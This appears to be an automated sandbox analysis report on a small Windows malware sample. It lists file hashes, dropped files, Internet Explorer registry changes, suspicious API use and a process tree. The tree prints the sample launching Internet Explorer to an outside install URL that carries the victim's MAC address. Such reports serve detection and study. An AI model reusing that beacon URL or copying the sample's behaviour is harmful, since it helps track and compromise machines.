Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
11-07-2024 13:16
Static task
static1
Behavioral task
behavioral1
Sample
3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe
Resource
win10v2004-20240709-en
General
-
Target
3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe
-
Size
43KB
-
MD5
3946d82a5bdf452cc353a76d56237ceb
-
SHA1
65530b998defc8efa8dc27d699f01e82727a612e
-
SHA256
22a454a6952affcff03b4dfeab6a36424411279f43fe436e0106355c2967ca6f
-
SHA512
016e423223b9deeb8687e2f15fc629fdab39f8ac70ffca626cb82373011d61664c1e2d5db93e8e6cabaa60465bbb1541a9d431867828d4e752cd80baa3dce643
-
SSDEEP
768:svMVvp3w/MrDy8VQxGIJYwHWLSxsFCKNgcog1B/9Ad4q+LO3Ez0lf3HPTQ9G2NJS:mMVvp3w/MrvYY+WLBzNgdg1B/9dq+Lqy
Malware Config
Signatures
-
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\sysqq.dat 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70159faf94d3da01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cdc5e48483fa34f869ba9241b951538000000000200000000001066000000010000200000002062fc0e73542c60f9c7630867ab14a48d32be6d8171245fd732947ad3a8ef10000000000e8000000002000020000000a7a59dda5af58b265c4dd3cab7afcb08e736b25ab32fa6f8eb236c9496bd74812000000084f91660aa1716214d95cfd8add1a7c5488ae7498b5a5faf5f4e68808aa0842d400000000e3f806ace4465d4999b3a7d6fe4f078a1cc51b47cdc968b17599b2eac71ff6660721d9c74b14bb708ebc085efa4d5ef076d5555b309ce1bbe4d31f06c918b2c iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cdc5e48483fa34f869ba9241b95153800000000020000000000106600000001000020000000b919785473c580be9129f5b85bcff78dd47bbff9e2a4d91a885dafd245805824000000000e8000000002000020000000e0ddb1c9469f0710b4efd25fa322cc1bb5f7d7f7d9dc4eee2bd707ee06800d4920000000b1a9a5ae393d4092a1a8bcd353969103c41be9bd286e47d3c7fc9bb52f4c6d7340000000af067e3f8a69c61ccb0e4cee3354b6f509c06392a7c2fd09ba5e7bd5a19697a95202c0fe2ea8e3a79ca25c5914c3bb70717ca100f21bac2f490c1d0a64e4729a iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{DAC21221-3F87-11EF-9A70-CEC55C810519} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2937538936" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60d0a3af94d3da01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31118228" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2937538936" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118228" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: 33 5628 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 5628 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5988 iexplore.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 5988 iexplore.exe 5988 iexplore.exe 5972 IEXPLORE.EXE 5972 IEXPLORE.EXE 5972 IEXPLORE.EXE 5972 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 4848 wrote to memory of 5988 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 87 PID 4848 wrote to memory of 5988 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 87 PID 5988 wrote to memory of 5972 5988 iexplore.exe 88 PID 5988 wrote to memory of 5972 5988 iexplore.exe 88 PID 5988 wrote to memory of 5972 5988 iexplore.exe 88 PID 4848 wrote to memory of 3448 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 56 PID 4848 wrote to memory of 3448 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 56 PID 4848 wrote to memory of 3448 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 56 PID 4848 wrote to memory of 3448 4848 3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe 56
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3448
-
C:\Users\Admin\AppData\Local\Temp\3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\3946d82a5bdf452cc353a76d56237ceb_JaffaCakes118.exe"2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\program files\internet explorer\iexplore.exe"C:\program files\internet explorer\iexplore.exe" "http://www.qqqc8.cn/bw/install.asp?ver=000001&tgid=wy1&address=CE-C5-5C-81-05-19®k=1&flag=9acb877f8c05b4764977052c46af2c8a&frandom=3993"3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5988 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5988 CREDAT:17410 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5972
-
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x150 0x3041⤵
- Suspicious use of AdjustPrivilegeToken
PID:5628
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
MD52d215944686f353b7de219ad3fc7e251
SHA118c638857ff451f1930e76e569834bb3febe1dd1
SHA256b230a08e053aab74b6a95f7cd4af2d5cae253bfd8b06d3f67865fc9a48d8c19c
SHA51275d290ba6c964dc63e95fc0294dc374818b3bdafae6c544ccce3385de5a091dd00763067e4caced752545512359adff2fc8ca800714831e31a3b99228e775fd5